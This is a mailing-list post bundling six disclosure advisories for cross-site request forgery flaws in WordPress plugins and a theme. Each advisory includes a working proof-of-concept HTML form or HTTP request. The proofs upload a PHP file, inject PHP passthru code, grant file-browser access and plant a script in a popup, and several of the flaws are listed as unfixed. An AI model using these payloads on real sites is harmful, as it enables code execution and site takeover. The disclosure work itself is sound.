Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 1 Mar 2017 07:17:14 +0100
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple Cross-Site Request Forgery vulnerabilities affecting various
 WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.



------------------------------------------------------------------------
Cross-Site Request Forgery in Atahualpa WordPress Theme
------------------------------------------------------------------------
Spyros Gasteratos, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross Site Request Forgery vulnerability exists in the Atahualpa
Wordpress theme which allows attackers to legitimate users into
performing unintended actions on the Atahualpa theme configuration page.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Atahualpa WordPress Theme [2]
WordPress Theme.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------

Atahualpa v3.7.24 has it's own Theme Options page where administrators
can set various options including changing the page's appearance or
injecting Javascript. The save button of this page doesn't include a
CSRF nonce token which gives attacker the ability to trick Wordpress
administrators into setting settings the attacker controls.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The theme's save configuration settings form doesn't include a Wordpress
CSRF nonce and consequently the script servicing the request doesn't
check for one. This allows the form to be submitted with preloaded
values as long as the browser sends a valid login cookie.

This allows attackers who lure legitimate users with an active Wordpress
session to an irrelevant website which submits the "Save Settings"
request to the user's Wordpress install. Since the request is towards a
domain for which the browser has cookies the legitimate cookies will be
submitted and the request will succeed.

The theme's configuration panel allows setting a variety of
configuration options including changes in the website's appearance as
well as appending Javascript in several areas. Attackers can use this
vulnerability to take over a Wordpress website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
Install the  theme, login as admin and load the following csrf poc in
the same browser on another tab, when clicking "Submit" it will modify
the page footer.

<html>
	<body>
		<form
action="http://<target>/wp-admin/themes.php?page=atahualpa-options"
method="POST">
			<input type="hidden" name="footer_style"
value="background&#45;color&#58;&#32;&#35;ffffff&#59;&#13;&#10;border&#45;top&#58;&#32;dashed&#32;1px&#32;&#35;cccccc&#59;&#13;&#10;padding&#58;&#32;10000px&#59;&#13;&#10;text&#45;align&#58;&#32;center&#59;&#13;&#10;color&#58;&#32;&#35;777777&#59;&#13;&#10;font&#45;size&#58;&#32;95&#37;&#59;&#13;&#10;&#47;&#42;bye&#42;&#47;"/>
			<input type="hidden" name="footer_style_links"
value="text&#45;decoration&#58;&#32;none&#59;&#13;&#10;color&#58;&#32;&#35;777777&#59;&#13;&#10;font&#45;weight&#58;&#32;normal&#59;"/>
			<input type="hidden" name="footer_style_links_hover"
value="text&#45;decoration&#58;&#32;none&#59;&#13;&#10;color&#58;&#32;&#35;777777&#59;&#13;&#10;font&#45;weight&#58;&#32;normal&#59;"/>
			<input type="hidden" name="footer_style_content"
value="Copyright&#32;&amp;copy&#59;&#32;&#37;current&#45;year&#37;&#32;&#37;home&#37;&#32;&#45;&#32;All&#32;Rights&#32;Reserved"/>
			<input type="hidden" name="full_width_footer" value="No"/>
			<input type="hidden" name="sticky_layout_footer" value="No"/>
			<input type="hidden" name="footer_show_queries" value="No"/>
			<input type="hidden" name="save" value=""/>
			<input type="hidden" name="action" value="save"/>
			<input type="hidden" name="category" value="footer&#45;style"/>
			<input type="submit" value="Submit"/>
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_atahualpa_wordpress_theme.html
[2] https://wordpress.org/themes/atahualpa/
------------------------------------------------------------------------
Cross-Site Request Forgery in File Manager WordPress plugin
------------------------------------------------------------------------
David Vaartjes, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery (CSRF) vulnerability was found in the File
Manager WordPress Plugin. Among others, this issue can be used to upload
arbitrary PHP files to the server.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0029

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the File Manager [2] WordPress
Plugin version 3.0.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The File Manager [2] WordPress Plugin is a file manager for WordPress
which can be used to upload, delete, copy, move, rename, archive and
extract files without the need for FTP. It was discovered that the File
Manager WordPress Plugin is vulnerable to Cross-Site Request Forgery.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The upload form used by the plugin has no protection against CSRF
attacks. As a result an attacker can for example upload arbitrary PHP
files to the server.

Please note that the target user needs to be logged in.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The target parameter holds a Base64-encoded destination path. By using
the proof of concept request below a file named info.php is uploaded to
the /wp-content/uploads/file-manager/ directory.

When uploaded, this file can be requested from the outside as follows:
http://<wp-server>/wp-content/uploads/file-manager/info.php

Request:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <wp-server>
Cookie: ALL_YOUR_WP_COOKIES
Connection: close
Content-Type: multipart/form-data;
boundary=---------------------------6427194103423794601262893907
	
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="cmd"
	
upload
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="target"
	
l1_d3AtY29udGVudC91cGxvYWRzL2ZpbGUtbWFuYWdlcg
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="suffix"
	
~
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="action"
	
connector
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="upload[]"; filename="info.php"
Content-Type: text/php
	
<?php
phpinfo();
?>
-----------------------------6427194103423794601262893907--

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_file_manager_wordpress_plugin.html
[2] https://wordpress.org/plugins/file-manager/
------------------------------------------------------------------------
Cross-Site Request Forgery in Global Content Blocks WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Global Content Blocks WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to update a content block to overwrite it with arbitrary PHP
code. Visiting a page or blog post that uses this content block will
cause the attacker's PHP code to be executed.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0031

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Global Content Blocks [2]
WordPress Plugin version 2.1.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Global Content Blocks [2] WordPress Plugin lets users create their
own shortcodes to insert reusable code snippets, PHP or HTML including
forms, opt-in boxes, iframes, Adsense code, etc, into pages and posts as
well as widgets and directly into php content. Global Content Blocks is
affected by Cross-Site Request Forgery.  Amongst others, this issue can
be used to update a content block to overwrite it with arbitrary PHP
code. Visiting a page or blog post that uses this content block will
cause the attacker's PHP code to be executed.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists due to the fact that Global Content Blocks does not use
the Cross-Site Request Forgery protection provided by WordPress. Actions
with Global Content Blocks have a predictable format, thus an attacker
can forge a request that can be executed by a logged in Administrator.
In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept will update/overwrite the content block
with id 1. In order to run the attacker's PHP code, a page/blog needs to
be viewed that contains this content block (eg, [contentblock id=1]).

<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=global-content-blocks"
method="POST">
			<input type="hidden" name="gcb_view" value="update" />
			<input type="hidden" name="update_it" value="1" />
			<input type="hidden" name="gcb_name" value="Foo" />
			<input type="hidden" name="gcb_custom_id" value="" />
			<input type="hidden" name="gcb_type" value="php" />
			<input type="hidden" name="gcb_description" value="" />
			<input type="hidden" name="gcbvalue" value="passthru('ls -la');" />
			<input type="hidden" name="gcb_updateshortcode" value="Update" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_global_content_blocks_wordpress_plugin.html
[2] https://wordpress.org/plugins/global-content-blocks/
------------------------------------------------------------------------
Cross-Site Request Forgery in WordPress Download Manager Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability has been found in the
WordPress Download Manager Plugin. By using this vulnerability an
attacker can change confidential settings of the plugin.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0005

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress Download Manager [2]
version 2.8.99.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WordPress Download Manager [2] is a Files / Documents Management Plugin
and Complete e-Commerce Solution for selling digital products. WordPress
Download Manager plugin will help you to manage, track, control file
downloads & sell digital products easily from your WordPress site. Use
Password Protection, User Roles Protection to control access to your
files. And simply setup prices when you need to sell the digital item.
User can directly download free items and when item has a price user
will have to go through cart & checkout. It has easiest checkout option
to give the user better experience in purchasing an item and which
always increase the probability of successful completion of an order. As
rather than trying to convince customer to buy something, it would be
more helpful to think of a cart optimization as an action to remove
barrier to that goal.

It was discovered that WordPress Download Manager is vulnerable to
Cross-Site Request Forgery. 

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The Download Manager plugin lacks a CSRF (nonce) token on the request of
saving settings. Because of this an attacker is able to change
confidential settings like file browser access and browser base dir by
luring a logged-in admin to follow a malicious link containing the proof
of concept below. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The proof of concept below gives file browser access to a user with
Editor privileges:
<html>
	<body>
		<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="task" value="wdm_save_settings"/>
			<input type="hidden" name="action" value="wdm_settings"/>
			<input type="hidden" name="section" value="basic"/>
			<input type="hidden" name="wpdm_permission_msg" value="Access
Denied"/>
			<input type="hidden" name="wpdm_login_msg" value="<a
href='http://<target>/wp-login.php'>Please login to download</a>&#10;"/>
			<input type="hidden" name="_wpdm_file_browser_root"
value="/srv/www/wordpress-default/"/>
			<input type="hidden" name="_wpdm_file_browser_access[]"
value="editor"/>
			<input type="hidden" name="_wpdm_file_browser_access[]"
value="administrator"/>
			<input type="hidden" name="__wpdm_sanitize_filename" value="0"/>
			<input type="hidden" name="__wpdm_download_speed" value="4096"/>
			<input type="hidden" name="__wpdm_download_resume" value="1"/>
			<input type="hidden" name="__wpdm_support_output_buffer" value="1"/>
			<input type="hidden" name="__wpdm_open_in_browser" value="0"/>
			<input type="hidden" name="_wpdm_recaptcha_site_key" value=""/>
			<input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/>
			<input type="hidden" name="__wpdm_disable_scripts[]" value=""/>
			<input type="hidden" name="__wpdm_login_url" value=""/>
			<input type="hidden" name="__wpdm_register_url" value=""/>
			<input type="hidden" name="__wpdm_user_dashboard" value=""/>
			<input type="submit"/>
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_download_manager_plugin.html
[2] https://wordpress.org/plugins/download-manager/
------------------------------------------------------------------------
Gwolle Guestbook mass action vulnerable for Cross-Site Request Forgery
------------------------------------------------------------------------
Radjnies Bhansingh, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery (CSRF) vulnerability was found in the
Gwolle Guestbook [2] WordPress plugin. This issue can be used by an
attacker to mass approve of disapprove entries. In order to exploit this
issue, the attacker needs to lure a victim with editor or admin
privileges to an attacker-controlled page or trick him into clicking a
malicous link. 

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0001

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the Gwolle Guestbook [2] WordPress
Plugin version 1.7.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue was fixed in Gwolle Guestbook version version 2.1.1. The most
recent version of Gwolle Guestbook can be obtained from the following
location:
https://wordpress.org/plugins/gwolle-gb/ [2]

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Gwolle Guestbook for WordPress is a guestbook made in order to provide
an easy and slim way to integrate a guestbook into your WordPress
powered site. Don't use your 'comment' section the wrong way - install
Gwolle Guestbook and have a real guestbook.

A Cross-Site Request Forgery vulnerability was found in Gwolle
Guestbook. This issue can be used by an attacker to mass approve of
disapprove entries. In order to exploit this issue, the attacker needs
to lure a victim with editor or admin privileges to an
attacker-controlled page or trick him into clicking a malicous link.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The Gwolle guestbook allows actions to be performed on multiple entries
at once (mass-action). Although actions performed on a single entry do
provide protection against Cross-Site Request Forgery (CSRF) by using
wp-nonces, mass-action lacks this protection. Since the entry IDs are
enumerable it allows an attacker to mass approve of disapprove entries.

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------
The following proof of concept code demonstrates this issue:
<html>
	<body>
		<form
action="http://<target>/wordpress/wp-admin/admin.php?page=gwolle-gb%2Fentries.php"
method="POST">
			<input type="hidden" name="gwolle&#95;gb&#95;page" value="entries" />
			<input type="hidden" name="pageNum" value="1" />
			<input type="hidden" name="entriesOnThisPage" value="2" />
			<input type="hidden" name="show" value="all" />
			<input type="hidden" name="massEditAction1" value="check" />
			<input type="hidden" name="doaction" value="Apply" />
			<input type="hidden" name="check&#45;2" value="on" />
			<input type="hidden" name="check&#45;1" value="on" />
			<input type="hidden" name="massEditAction2" value="&#45;1" />
			<input type="hidden" name="" value="" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/gwolle_guestbook_mass_action_vulnerable_for_cross_site_request_forgery.html
[2] https://wordpress.org/plugins/gwolle-gb/
------------------------------------------------------------------------
Popup by Supsystic WordPress plugin vulnerable to Cross-Site Request
Forgery
------------------------------------------------------------------------
Radjnies Bhansingh, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-site Request Forgery vulnerablity exists in the Popup by
Supsystic WordPress Plugin. This vulnerablity allows attackers to add
and modify scripting code that will target authenticated WordPress
admins or visitors that see the popup generated by this plugin. Before
exploitation of this issue succeeds, and scripting code is therefore
injected, a victim WordPress admin to click a specially crafted link or
visit a malicious attacker-controlled webpage. 

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0013

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the Popup by Supsystic [2]
WordPress plugin version 1.7.6.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The aim of the Popup by Supsystic [2] WordPress plugin is to help you
get more newsletter subscribers, promote new products, deliver special
offers and to get more social followers.

A Cross-site Request Forgery vulnerablity exists in the Popup by
Supsystic WordPress Plugin. This vulnerablity allows attackers to add
and modify scripting code that will target authenticated admins or
visitors that see the popup generated by this plugin. In order to
exploit this issue the target user must click a specially crafted link
or visit a malicious website (or advertisement).

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists because Popup by Supsystic lacks protection against
Cross-Site Request Forgery attacks. The following proof of concept code
demonstrates this issue:

<html>
	<body>
		<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="params[main][show_on]" value="page_load"
/>
			<input type="hidden" name="params[main][show_on_page_load_delay]"
value="" />
			<input type="hidden" name="ppsCopyTextCode"
value="[supsystic-show-popup id=100]" />
			<input type="hidden" name="ppsCopyTextCode"
value="onclick=&quot;ppsShowPopup(100); return false;&quot;" />
			<input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100"
/>
			<input type="hidden" name="params[main][show_on_click_on_el_delay]"
value="0" />
			<input type="hidden" name="params[main][show_on_scroll_window_delay]"
value="0" />
			<input type="hidden"
name="params[main][show_on_scroll_window_perc_scroll]" value="0" />
			<input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100"
/>
			<input type="hidden" name="params[main][show_on_link_follow_delay]"
value="0" />
			<input type="hidden" name="ppsCopyTextCode"
value="[supsystic-popup-content id=100]" />
			<input type="hidden" name="params[main][close_on]" value="user_close"
/>
			<input type="hidden" name="params[main][show_pages]" value="all" />
			<input type="hidden" name="params[main][show_time_from]"
value="12:00am" />
			<input type="hidden" name="params[main][show_time_to]"
value="12:00am" />
			<input type="hidden" name="params[main][show_date_from]" value="" />
			<input type="hidden" name="params[main][show_date_to]" value="" />
			<input type="hidden" name="params[main][show_to]" value="everyone" />
			<input type="hidden"
name="params[main][show_to_first_time_visit_days]" value="30" />
			<input type="hidden"
name="params[main][show_to_until_make_action_days]" value="30" />
			<input type="hidden" name="params[main][count_times_num]" value="1"
/>
			<input type="hidden" name="params[main][count_times_mes]" value="day"
/>
			<input type="hidden" name="params[main][hide_for_devices_show]"
value="0" />
			<input type="hidden" name="params[main][hide_for_post_types_show]"
value="0" />
			<input type="hidden" name="params[main][hide_for_ips_show]" value="0"
/>
			<input type="hidden" name="params[main][hide_for_ips]" value="" />
			<input type="hidden" name="params[main][hide_for_countries_show]"
value="0" />
			<input type="hidden" name="params[main][hide_for_languages_show]"
value="0" />
			<input type="hidden" name="params[main][hide_search_engines_show]"
value="0" />
			<input type="hidden" name="params[main][hide_preg_url_show]"
value="0" />
			<input type="hidden" name="params[main][hide_preg_url]" value="" />
			<input type="hidden" name="params[main][hide_for_user_roles_show]"
value="0" />
			<input type="hidden" name="params[tpl][width]" value="400" />
			<input type="hidden" name="params[tpl][width_measure]" value="px" />
			<input type="hidden" name="params[tpl][bg_overlay_opacity]"
value="0.5" />
			<input type="hidden" name="params[tpl][bg_type_0]" value="color" />
			<input type="hidden" name="params[tpl][bg_img_0]" value="" />
			<input type="hidden" name="params[tpl][bg_color_0]" value="#8c7764"
/>
			<input type="hidden" name="params[tpl][bg_type_1]" value="color" />
			<input type="hidden" name="params[tpl][bg_img_1]" value="" />
			<input type="hidden" name="params[tpl][bg_color_1]" value="#75362c"
/>
			<input type="hidden" name="params[tpl][font_label]" value="default"
/>
			<input type="hidden" name="params[tpl][label_font_color]"
value="#ffffff" />
			<input type="hidden" name="params[tpl][font_txt_0]" value="default"
/>
			<input type="hidden" name="params[tpl][text_font_color_0]"
value="#f9e6ce" />
			<input type="hidden" name="params[tpl][font_footer]" value="default"
/>
			<input type="hidden" name="params[tpl][footer_font_color]"
value="#585858" />
			<input type="hidden" name="params[tpl][responsive_mode]" value="def"
/>
			<input type="hidden" name="params[tpl][reidrect_on_close]" value=""
/>
			<input type="hidden" name="params[tpl][close_btn]"
value="while_close" />
			<input type="hidden" name="params[tpl][bullets]" value="lists_green"
/>
			<input type="hidden" name="layered_style_promo" value="1" />
			<input type="hidden" name="params[tpl][layered_pos]" value="" />
			<input type="hidden" name="params[tpl][enb_label]" value="1" />
			<input type="hidden" name="params[tpl][label]" value="SIGN UP<br> to
our Newsletter!" />
			<input type="hidden" name="params[tpl][enb_txt_0]" value="1" />
			<input type="hidden" name="params_tpl_txt_0" value="<p>Popup by
Supsystic lets you easily create elegant overlapping windows with
unlimited features. Pop-ups with Slider, Lightbox, Contact and
Subscription forms and more</p>" />
			<input type="hidden" name="params[tpl][foot_note]" value="We respect
your privacy. Your information will not be shared with any third party
and you can unsubscribe at any time " />
			<input type="hidden" name="params[tpl][enb_sm_facebook]" value="1" />
			<input type="hidden" name="params[tpl][enb_sm_googleplus]" value="1"
/>
			<input type="hidden" name="params[tpl][enb_sm_twitter]" value="1" />
			<input type="hidden" name="params[tpl][sm_design]" value="boxy" />
			<input type="hidden" name="params[tpl][anim_key]" value="none" />
			<input type="hidden" name="params[tpl][anim_duration]" value="" />
			<input type="hidden" name="params[tpl][enb_subscribe]" value="1" />
			<input type="hidden" name="params[tpl][sub_dest]" value="wordpress"
/>
			<input type="hidden" name="params[tpl][sub_wp_create_user_role]"
value="subscriber" />
			<input type="hidden" name="params[tpl][sub_aweber_listname]" value=""
/>
			<input type="hidden" name="params[tpl][sub_aweber_adtracking]"
value="" />
			<input type="hidden" name="params[tpl][sub_mailchimp_api_key]"
value="" />
			<input type="hidden" name="params[tpl][sub_mailchimp_groups_full]"
value="" />
			<input type="hidden" name="test_email"
value="canzihazcandy@...il.com" />
			<input type="hidden" name="params[tpl][sub_fields][name][enb]"
value="1" />
			<input type="hidden" name="params[tpl][sub_fields][name][name]"
value="name" />
			<input type="hidden" name="params[tpl][sub_fields][name][html]"
value="text" />
			<input type="hidden" name="params[tpl][sub_fields][name][label]"
value="Name" />
			<input type="hidden" name="params[tpl][sub_fields][name][value]"
value="" />
			<input type="hidden" name="params[tpl][sub_fields][name][custom]"
value="0" />
			<input type="hidden" name="params[tpl][sub_fields][name][mandatory]"
value="0" />
			<input type="hidden" name="params[tpl][sub_fields][email][name]"
value="email" />
			<input type="hidden" name="params[tpl][sub_fields][email][html]"
value="text" />
			<input type="hidden" name="params[tpl][sub_fields][email][label]"
value="E-Mail" />
			<input type="hidden" name="params[tpl][sub_fields][email][value]"
value="" />
			<input type="hidden" name="params[tpl][sub_fields][email][custom]"
value="0" />
			<input type="hidden" name="params[tpl][sub_fields][email][mandatory]"
value="1" />
			<input type="hidden" name="params[tpl][sub_fields][email][enb]"
value="1" />
			<input type="hidden" name="params[tpl][sub_txt_confirm_sent]"
value="Confirmation link was sent to your email address. Check your
email!" />
			<input type="hidden" name="params[tpl][sub_txt_success]" value="Thank
you for subscribe!" />
			<input type="hidden" name="params[tpl][sub_txt_invalid_email]"
value="Empty or invalid email" />
			<input type="hidden" name="params[tpl][sub_txt_exists_email]"
value="Empty or invalid email" />
			<input type="hidden" name="params[tpl][sub_redirect_url]" value="" />
			<input type="hidden" name="params[tpl][sub_txt_confirm_mail_subject]"
value="Confirm subscription on [sitename]" />
			<input type="hidden" name="params[tpl][sub_txt_confirm_mail_from]"
value="admin@...l.com" />
			<input type="hidden" name="params[tpl][sub_txt_confirm_mail_message]"
value="You subscribed on site <a
href=&quot;[siteurl]&quot;>[sitename]</a>. Follow <a
href=&quot;[confirm_link]&quot;>this link</a> to complete your
subscription. If you did not subscribe here - just ignore this message."
/>
			<input type="hidden"
name="params[tpl][sub_txt_subscriber_mail_subject]" value="[sitename]
Your username and password" />
			<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_from]"
value="admin@...l.com" />
			<input type="hidden"
name="params[tpl][sub_txt_subscriber_mail_message]" value="Username:
[user_login]<br />Password: [password]<br />[login_url]" />
			<input type="hidden" name="params[tpl][sub_redirect_email_exists]"
value="" />
			<input type="hidden" name="params[tpl][sub_btn_label]" value="SIGN
UP" />
			<input type="hidden" name="params[tpl][sub_new_email]"
value="admin&@...l.com" />
			<input type="hidden" name="params[tpl][sub_new_subject]" value="New
Subscriber on Summer of Pwnage" />
			<input type="hidden" name="params[tpl][sub_new_message]" value="You
have new subscriber on your site <a
href=&quot;[siteurl]&quot;>[sitename]</a>, here us subscriber
information:<br />[subscriber_data]" />
			<input type="hidden" name="stat_from_txt" value="" />
			<input type="hidden" name="stat_to_txt" value="" />
			<input type="hidden" name="css" value="" />
			<input type="hidden" name="html" value="<link
rel=&quot;stylesheet&quot; type=&quot;text/css&quot;
href=&quot;//fonts.googleapis.com/css?family=Amatic+SC&quot; />&#10; 
<script>alert(&quot;xss&quot;)</script>&#10;<div
id=&quot;ppsPopupShell_[ID]&quot; class=&quot;ppsPopupShell
ppsPopupListsShell&quot;>&#10;	<a href=&quot;#&quot;
class=&quot;ppsPopupClose
ppsPopupClose_[close_btn]&quot;></a>&#10;&#10;	<div
class=&quot;ppsInnerTblContent&quot;>&#10;		<div
class=&quot;ppsPopupListsInner ppsPopupInner&quot;>&#10;			[if
enb_label]&#10;				<div class=&quot;ppsPopupLabel
ppsPopupListsLabel&quot;>[label]</div>&#10;			[endif]&#10;			<div
style=&quot;clear: both;&quot;></div>&#10;			[if enb_txt_0]&#10;				<div
class=&quot;ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0
ppsPopupTxt_0&quot;>&#10;				[txt_0]&#10;				</div>&#10;			[endif]&#10;			[if
enb_subscribe]&#10;				<div
class=&quot;ppsSubscribeShell&quot;>&#10;					[sub_form_start]&#10;					[sub_fields_html]&#10;					<input
type=&quot;submit&quot; name=&quot;submit&quot;
value=&quot;[sub_btn_label]&quot;
/>&#10;					[sub_form_end]&#10;					<div style=&quot;clear:
both;&quot;></div>&#10;				</div>&#10;			[endif]&#10;			<div
style=&quot;clear: both;&quot;></div>&#10;			<div
class=&quot;ppsRightCol&quot;>&#10;				[if enb_sm]&#10;					<div
style=&quot;clear: both;&quot;></div>&#10;					<div
class=&quot;ppsSm&quot;>&#10;					[sm_html]&#10;					</div>&#10;				[endif]&#10;				[if
enb_foot_note]&#10;					<div
class=&quot;ppsFootNote&quot;>&#10;					[foot_note]&#10;					</div>&#10;				[endif]&#10;			</div>&#10;		</div>&#10;	</div>&#10;</div>&#10;"
/>
			<input type="hidden" name="params[opts_attrs][bg_number]" value="2"
/>
			<input type="hidden" name="params[opts_attrs][txt_block_number]"
value="1" />
			<input type="hidden" name="mod" value="popup" />
			<input type="hidden" name="action" value="save" />
			<input type="hidden" name="id" value="100" />
			<input type="hidden" name="params_tpl_txt_val_0" value="<p>Popup by
Supsystic lets you easily create elegant overlapping windows with
unlimited features. Pop-ups with Slider, Lightbox, Contact and
Subscription forms and more</p>" />
			<input type="hidden" name="pl" value="pps" />
			<input type="hidden" name="reqType" value="ajax" />
			<input type="submit"/>
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/popup_by_supsystic_wordpress_plugin_vulnerable_to_cross_site_request_forgery.html
[2] https://wordpress.org/plugins/popup-by-supsystic/

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ